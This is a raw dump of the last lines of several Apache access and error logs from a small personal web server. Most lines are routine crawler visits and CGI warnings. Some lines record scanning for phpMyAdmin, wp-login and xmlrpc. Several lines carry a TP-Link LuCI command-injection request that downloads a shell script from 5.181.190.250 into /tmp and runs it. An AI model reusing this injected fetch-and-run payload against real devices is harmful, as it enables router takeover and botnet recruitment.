===== last 20 lines of /var/log/apache2/access.log =====
192.99.9.159 - - [19/Apr/2024:00:44:27 -0800] "GET /phpMyAdmin-5.2.0-all-languages/index.php?lang=en HTTP/1.1" 401 8863 "https://q.lam1.us/phpMyAdmin-5.2.0-all-languages/index.php?lang=en" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
192.99.9.159 - - [19/Apr/2024:00:44:28 -0800] "GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1" 301 4250 "http://q.lam1.us/phpMyAdmin-4.9.7/index.php?lang=en" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
192.99.9.159 - - [19/Apr/2024:00:44:28 -0800] "GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1" 401 8821 "https://q.lam1.us/phpMyAdmin-4.9.7/index.php?lang=en" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
192.99.9.159 - - [19/Apr/2024:00:44:29 -0800] "GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1" 301 4242 "http://q.lam1.us/phpMyAdmin-3/index.php?lang=en" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
192.99.9.159 - - [19/Apr/2024:00:44:29 -0800] "GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1" 401 8804 "https://q.lam1.us/phpMyAdmin-3/index.php?lang=en" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
192.99.9.159 - - [19/Apr/2024:00:44:30 -0800] "GET /phpMyAdmin4/index.php?lang=en HTTP/1.1" 301 4240 "http://q.lam1.us/phpMyAdmin4/index.php?lang=en" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
192.99.9.159 - - [19/Apr/2024:00:44:31 -0800] "GET /phpMyAdmin4/index.php?lang=en HTTP/1.1" 401 8800 "https://q.lam1.us/phpMyAdmin4/index.php?lang=en" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
185.191.126.213 - - [19/Apr/2024:00:45:53 -0800] "GET / HTTP/1.0" 400 622 "-" "-"
18.188.44.223 - - [19/Apr/2024:00:50:57 -0800] "GET /robots.txt HTTP/1.1" 200 4390 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
18.188.44.223 - - [19/Apr/2024:00:50:57 -0800] "GET /Public/?C=D;O=A HTTP/1.1" 200 6386 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
18.221.15.15 - - [19/Apr/2024:01:07:53 -0800] "GET /robots.txt HTTP/1.1" 200 4390 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
18.221.15.15 - - [19/Apr/2024:01:07:53 -0800] "GET /apropos HTTP/1.1" 200 4696 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.145.151.141 - - [19/Apr/2024:01:09:47 -0800] "GET /robots.txt HTTP/1.1" 301 4268 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.145.151.141 - - [19/Apr/2024:01:09:47 -0800] "GET /robots.txt HTTP/1.1" 200 4390 "https://ak16.lam1.us/robots.txt" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.145.151.141 - - [19/Apr/2024:01:09:48 -0800] "GET /About HTTP/1.1" 301 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.145.151.141 - - [19/Apr/2024:01:09:48 -0800] "GET /About HTTP/1.1" 301 544 "https://ak16.lam1.us/About" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.145.151.141 - - [19/Apr/2024:01:09:48 -0800] "GET /About/ HTTP/1.1" 200 8452 "https://ak20.lam1.us/About" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
5.181.190.250 - - [19/Apr/2024:01:14:42 -0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 301 4552 "http://206.174.115.122:80/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk)" "Go-http-client/1.1"
5.181.190.250 - - [19/Apr/2024:01:14:43 -0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 401 9149 "https://206.174.115.122/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk)" "Go-http-client/1.1"
3.138.102.178 - - [19/Apr/2024:01:16:26 -0800] "GET /robots.txt HTTP/1.1" 200 4390 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
===== end of /var/log/apache2/access.log =====
===== last 20 lines of /var/log/apache2/error.log =====
[Fri Apr 19 00:00:28.127192 2024] [mpm_prefork:notice] [pid 1201] AH00163: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 mod_perl/2.0.12 Perl/v5.34.0 configured -- resuming normal operations
[Fri Apr 19 00:00:28.127206 2024] [core:notice] [pid 1201] AH00094: Command line: '/usr/sbin/apache2'
[Fri Apr 19 01:16:27.184907 2024] [cgi:error] [pid 35457] [client 3.138.102.178:15056] AH01215: Use of uninitialized value $ARGV[0] in lc at /var/www/no-ssl/html/Public/Scripts/Error-Logs-Test.cgi-pl line 226.: /var/www/no-ssl/html/Public/Scripts/Error-Logs-Test.cgi-pl
[Fri Apr 19 01:16:27.184945 2024] [cgi:error] [pid 35457] [client 3.138.102.178:15056] AH01215: Use of uninitialized value $ARGV[0] in lc at /var/www/no-ssl/html/Public/Scripts/Error-Logs-Test.cgi-pl line 227.: /var/www/no-ssl/html/Public/Scripts/Error-Logs-Test.cgi-pl
[Fri Apr 19 01:16:27.184969 2024] [cgi:error] [pid 35457] [client 3.138.102.178:15056] AH01215: Use of uninitialized value $ARGV[0] in lc at /var/www/no-ssl/html/Public/Scripts/Error-Logs-Test.cgi-pl line 228.: /var/www/no-ssl/html/Public/Scripts/Error-Logs-Test.cgi-pl
===== end of /var/log/apache2/error.log =====
===== last 20 lines of /var/log/apache2/gci_access_log =====
::1 - - [19/Apr/2024:00:44:46 -0800] "OPTIONS * HTTP/1.0" 200 -
::1 - - [19/Apr/2024:00:44:47 -0800] "OPTIONS * HTTP/1.0" 200 -
::1 - - [19/Apr/2024:00:44:48 -0800] "OPTIONS * HTTP/1.0" 200 -
::1 - - [19/Apr/2024:00:44:58 -0800] "OPTIONS * HTTP/1.0" 200 -
124.120.153.126 - - [19/Apr/2024:00:49:01 -0800] "GET / HTTP/1.1" 200 7242
51.222.253.11 - - [19/Apr/2024:00:49:41 -0800] "GET /Images/My/ HTTP/1.1" 200 824
49.0.203.114 - - [19/Apr/2024:00:51:21 -0800] "GET /Public/Scripts/info.cgi-pl?(info-stnd)repeated-search HTTP/1.1" 200 349
172.104.242.173 - - [19/Apr/2024:00:56:24 -0800] "-" 408 -
66.249.79.203 - - [19/Apr/2024:00:56:27 -0800] "GET /robots.txt HTTP/1.1" 200 205
66.249.79.202 - - [19/Apr/2024:00:56:27 -0800] "GET /Images/Associated-Press-logo.png HTTP/1.1" 200 709
91.191.209.206 - - [19/Apr/2024:00:56:31 -0800] "\x03" 400 303
66.249.66.205 - - [19/Apr/2024:00:57:16 -0800] "GET /Images/SCROLLDO.GIF HTTP/1.1" 200 88
124.243.136.43 - - [19/Apr/2024:00:57:19 -0800] "GET /manual/tr/mod/mod_setenvif.html HTTP/1.1" 200 6036
51.222.253.11 - - [19/Apr/2024:00:57:23 -0800] "GET /Public/Content/Test/ HTTP/1.1" 200 3993
3.149.213.209 - - [19/Apr/2024:01:03:22 -0800] "GET /robots.txt HTTP/1.1" 200 363
3.149.213.209 - - [19/Apr/2024:01:03:23 -0800] "GET /Public HTTP/1.1" 301 311
3.149.213.209 - - [19/Apr/2024:01:03:23 -0800] "GET /Public/ HTTP/1.1" 200 6162
5.181.190.250 - - [19/Apr/2024:01:14:41 -0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F5.181.190.250%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+shk) HTTP/1.1" 302 475
216.244.66.232 - - [19/Apr/2024:01:15:57 -0800] "GET /robots.txt HTTP/1.1" 200 363
216.244.66.232 - - [19/Apr/2024:01:15:57 -0800] "GET /robots.txt HTTP/1.1" 200 363
===== end of /var/log/apache2/gci_access_log =====
===== last 20 lines of /var/log/apache2/gci_error_log =====
[Thu Apr 18 12:43:11.549973 2024] [cgi:error] [pid 638474] [client 192.99.36.126:35226] AH01215: : /var/www/no-ssl/html/Public/Scripts/info.cgi-pl
[Thu Apr 18 16:12:46.015088 2024] [cgi:error] [pid 644893] [client 85.208.96.209:20786] AH01215: Use of uninitialized value $ENV{"HTTP_REFERER"} in concatenation (.) or string at /var/www/no-ssl/html/Public/Scripts/Style.cgi-pl line 18.: /var/www/no-ssl/html/Public/Scripts/Style.cgi-pl
[Thu Apr 18 16:29:27.229453 2024] [cgi:error] [pid 638474] [client 66.249.66.164:59240] AH01215: Use of uninitialized value $ARGV[0] in lc at /var/www/no-ssl/html/Public/Scripts/Error-Logs-Test.cgi-pl line 226.: /var/www/no-ssl/html/Public/Scripts/Error-Logs-Test.cgi-pl
[Thu Apr 18 16:29:27.229487 2024] [cgi:error] [pid 638474] [client 66.249.66.164:59240] AH01215: Use of uninitialized value $ARGV[0] in lc at /var/www/no-ssl/html/Public/Scripts/Error-Logs-Test.cgi-pl line 227.: /var/www/no-ssl/html/Public/Scripts/Error-Logs-Test.cgi-pl
[Thu Apr 18 16:29:27.229506 2024] [cgi:error] [pid 638474] [client 66.249.66.164:59240] AH01215: Use of uninitialized value $ARGV[0] in lc at /var/www/no-ssl/html/Public/Scripts/Error-Logs-Test.cgi-pl line 228.: /var/www/no-ssl/html/Public/Scripts/Error-Logs-Test.cgi-pl
[Thu Apr 18 16:39:43.199087 2024] [cgi:error] [pid 638474] [client 52.230.152.189:2813] AH01215: : /var/www/no-ssl/html/Public/Scripts/info.cgi-pl
[Thu Apr 18 16:39:45.435371 2024] [cgi:error] [pid 657299] [client 52.230.152.189:53219] AH01215: : /var/www/no-ssl/html/Public/Scripts/info.cgi-pl
[Thu Apr 18 16:39:47.311164 2024] [cgi:error] [pid 638497] [client 52.230.152.189:61295] AH01215: : /var/www/no-ssl/html/Public/Scripts/info.cgi-pl
[Thu Apr 18 16:40:40.734667 2024] [cgi:error] [pid 645381] [client 52.230.152.189:2413] AH01215: : /var/www/no-ssl/html/Public/Scripts/info.cgi-pl
[Thu Apr 18 16:40:43.206757 2024] [cgi:error] [pid 659381] [client 52.230.152.189:33869] AH01215: : /var/www/no-ssl/html/Public/Scripts/info.cgi-pl
[Thu Apr 18 16:41:57.769957 2024] [cgi:error] [pid 638497] [client 52.230.152.189:24441] AH01215: : /var/www/no-ssl/html/Public/Scripts/info.cgi-pl
[Thu Apr 18 16:48:10.437937 2024] [cgi:error] [pid 634037] [client 52.230.152.189:4779] AH01215: : /var/www/no-ssl/html/Public/Scripts/info.cgi-pl
[Thu Apr 18 16:50:12.249835 2024] [cgi:error] [pid 645381] [client 52.230.152.189:3893] AH01215: : /var/www/no-ssl/html/Public/Scripts/info.cgi-pl
[Thu Apr 18 17:25:37.207647 2024] [php:error] [pid 657299] [client 43.139.107.122:57790] script '/var/www/gci/html/xmlrpc.php' not found or unable to stat
[Thu Apr 18 19:21:51.636931 2024] [php:error] [pid 667962] [client 106.55.231.151:52646] script '/var/www/gci/html/xmlrpc.php' not found or unable to stat
[Thu Apr 18 22:11:41.306794 2024] [cgi:error] [pid 4284] [client 185.191.171.4:9264] AH01215: Use of uninitialized value $ENV{"HTTP_REFERER"} in concatenation (.) or string at /var/www/no-ssl/html/Public/Scripts/Style.cgi-pl line 18.: /var/www/no-ssl/html/Public/Scripts/Style.cgi-pl
[Thu Apr 18 22:15:34.915352 2024] [php:error] [pid 18714] [client 181.49.232.13:49000] script '/var/www/gci/html/index.php' not found or unable to stat
[Thu Apr 18 23:17:30.347011 2024] [ssl:error] [pid 20336] [client 35.216.194.252:60282] AH02219: access to /var/www/gci/html/server-status failed, reason: SSL connection required
[Thu Apr 18 23:17:32.356146 2024] [php:error] [pid 18716] [client 35.216.194.252:60318] script '/var/www/gci/html/info.php' not found or unable to stat
[Fri Apr 19 00:43:36.938555 2024] [php:error] [pid 35465] [client 192.99.9.159:38062] script '/var/www/gci/html/index.php' not found or unable to stat
===== end of /var/log/apache2/gci_error_log =====
===== last 20 lines of /var/log/apache2/nudson_access_log =====
216.131.107.126 - - [18/Apr/2024:21:29:50 -0800] "GET /stats/ HTTP/1.0" 404 4011
216.131.107.126 - - [18/Apr/2024:21:29:50 -0800] "GET / HTTP/1.0" 200 20959
216.131.107.126 - - [18/Apr/2024:21:29:54 -0800] "GET /HomeVideos/a_zebEnteringCabin.avi HTTP/1.0" 200 43638866
216.244.66.232 - - [18/Apr/2024:21:31:58 -0800] "GET /robots.txt HTTP/1.1" 404 3919
216.244.66.232 - - [18/Apr/2024:21:51:19 -0800] "GET /manual/es/mod/mod_slotmem_shm.html HTTP/1.1" 200 8978
216.244.66.232 - - [18/Apr/2024:21:51:23 -0800] "GET /manual/ja/mod/mod_authn_socache.html HTTP/1.1" 200 19395
216.244.66.232 - - [18/Apr/2024:23:24:04 -0800] "GET /robots.txt HTTP/1.1" 404 3920
216.244.66.232 - - [18/Apr/2024:23:44:11 -0800] "GET /manual/zh-cn/rewrite/advanced.html HTTP/1.1" 200 16351
216.244.66.232 - - [19/Apr/2024:00:20:43 -0800] "GET /robots.txt HTTP/1.1" 404 3916
216.131.107.126 - - [19/Apr/2024:00:21:41 -0800] "GET /stats/ HTTP/1.0" 404 3976
216.131.107.126 - - [19/Apr/2024:00:21:41 -0800] "GET / HTTP/1.0" 200 20957
216.131.107.126 - - [19/Apr/2024:00:21:44 -0800] "GET /HomeVideos/a_zebEnteringCabin.avi HTTP/1.0" 200 43638866
216.244.66.232 - - [19/Apr/2024:00:35:56 -0800] "GET /manual/es/mod/mod_negotiation.html HTTP/1.1" 200 21982
216.244.66.232 - - [19/Apr/2024:00:38:19 -0800] "GET /manual/pt-br/vhosts/ip-based.html HTTP/1.1" 200 13706
216.244.66.232 - - [19/Apr/2024:00:40:52 -0800] "GET /manual/en/mod/mod_slotmem_plain.html HTTP/1.1" 200 8366
216.244.66.232 - - [19/Apr/2024:00:40:54 -0800] "GET /manual/ko/rewrite/rewritemap.html HTTP/1.1" 200 25091
216.131.107.126 - - [19/Apr/2024:00:58:07 -0800] "GET /stats/ HTTP/1.0" 404 3992
216.131.107.126 - - [19/Apr/2024:00:58:07 -0800] "GET / HTTP/1.0" 200 20957
216.131.107.126 - - [19/Apr/2024:00:58:10 -0800] "GET /HomeVideos/a_zebEnteringCabin.avi HTTP/1.0" 200 43638866
216.244.66.232 - - [19/Apr/2024:01:15:57 -0800] "GET /robots.txt HTTP/1.1" 404 3915
===== end of /var/log/apache2/nudson_access_log =====
===== last 20 lines of /var/log/apache2/nudson_error_log =====
[Wed Mar 20 07:46:59.924095 2024] [cgi:error] [pid 285097] [client 216.244.66.232:54146] AH01215: CGI::param called in list context from /var/www/no-ssl/html/Public/Scripts/Forms-Test.cgi-pl line 69, this can lead to vulnerabilities. See the warning in "Fetching the value or values of a single named parameter" at /usr/share/perl5/CGI.pm line 415.: /var/www/no-ssl/html/Public/Scripts/Forms-Test.cgi-pl
[Sat Mar 23 20:33:11.947333 2024] [cgi:error] [pid 97889] [client 216.244.66.232:48122] AH01215: Use of uninitialized value $_[0] in pattern match (m//) at /usr/local/lib/site_perl/LAM/LAM.pm line 242.: /var/www/no-ssl/html/Public/Scripts/html.cgi-pl
[Sun Mar 24 22:37:20.044682 2024] [php:error] [pid 109161] [client 118.26.38.35:35980] script '/var/www/nudson/index.php' not found or unable to stat
[Sun Mar 24 22:37:20.773454 2024] [php:error] [pid 102589] [client 118.26.38.35:35828] script '/var/www/no-ssl/html/Public/initJs.php' not found or unable to stat
[Sun Mar 24 22:37:24.424935 2024] [php:error] [pid 102606] [client 118.26.38.35:35822] script '/var/www/nudson/index.php' not found or unable to stat
[Sun Mar 24 22:37:25.685035 2024] [php:error] [pid 109173] [client 118.26.38.35:35834] script '/var/www/nudson/index.php' not found or unable to stat
[Sun Mar 24 22:37:26.222660 2024] [php:error] [pid 109173] [client 118.26.38.35:35834] script '/var/www/nudson/leftDao.php' not found or unable to stat
[Mon Mar 25 18:21:25.651560 2024] [php:error] [pid 131244] [client 84.247.105.108:40508] script '/var/www/nudson/wp-login.php' not found or unable to stat
[Wed Apr 03 00:36:33.640268 2024] [php:error] [pid 99147] [client 157.7.104.31:49034] script '/var/www/nudson/wp-login.php' not found or unable to stat
[Wed Apr 03 00:37:25.058073 2024] [php:error] [pid 99152] [client 69.163.224.117:47810] script '/var/www/nudson/wp-login.php' not found or unable to stat
[Mon Apr 08 16:45:23.722625 2024] [php:error] [pid 2458] [client 180.110.242.90:7191] script '/var/www/nudson/wp-login.php' not found or unable to stat
[Mon Apr 08 16:45:23.730616 2024] [php:error] [pid 1257] [client 180.110.242.90:11483] script '/var/www/no-ssl/html/Public/Scripts/wp-login.php' not found or unable to stat
[Mon Apr 08 16:45:23.737570 2024] [php:error] [pid 2497] [client 180.110.242.90:10307] script '/var/www/no-ssl/html/Public/wp-login.php' not found or unable to stat
[Tue Apr 09 18:00:03.716006 2024] [php:error] [pid 7013] [client 180.110.243.52:9377] script '/var/www/no-ssl/html/Public/wp-login.php' not found or unable to stat
[Tue Apr 09 18:00:03.721768 2024] [php:error] [pid 7950] [client 180.110.243.52:9485] script '/var/www/no-ssl/html/Public/Scripts/wp-login.php' not found or unable to stat
[Tue Apr 09 18:00:03.723632 2024] [php:error] [pid 7015] [client 180.110.243.52:1153] script '/var/www/nudson/wp-login.php' not found or unable to stat
[Thu Apr 11 04:22:16.923984 2024] [php:error] [pid 30664] [client 185.104.44.131:11566] script '/var/www/nudson/wp-login.php' not found or unable to stat
[Sun Apr 14 21:01:02.732374 2024] [cgi:error] [pid 249542] [client 192.99.37.132:56346] AH01215: : /var/www/no-ssl/html/Public/Scripts/info.cgi-pl
[Tue Apr 16 17:25:29.352548 2024] [cgi:error] [pid 548954] [client 135.181.213.219:58500] AH01215: : /var/www/no-ssl/html/Public/Scripts/info.cgi-pl
[Thu Apr 18 19:46:42.210928 2024] [php:error] [pid 667460] [client 146.148.65.152:57636] script '/var/www/nudson/wp-login.php' not found or unable to stat
===== end of /var/log/apache2/nudson_error_log =====
===== last 20 lines of /var/log/apache2/other_vhosts_access.log =====
===== end of /var/log/apache2/other_vhosts_access.log =====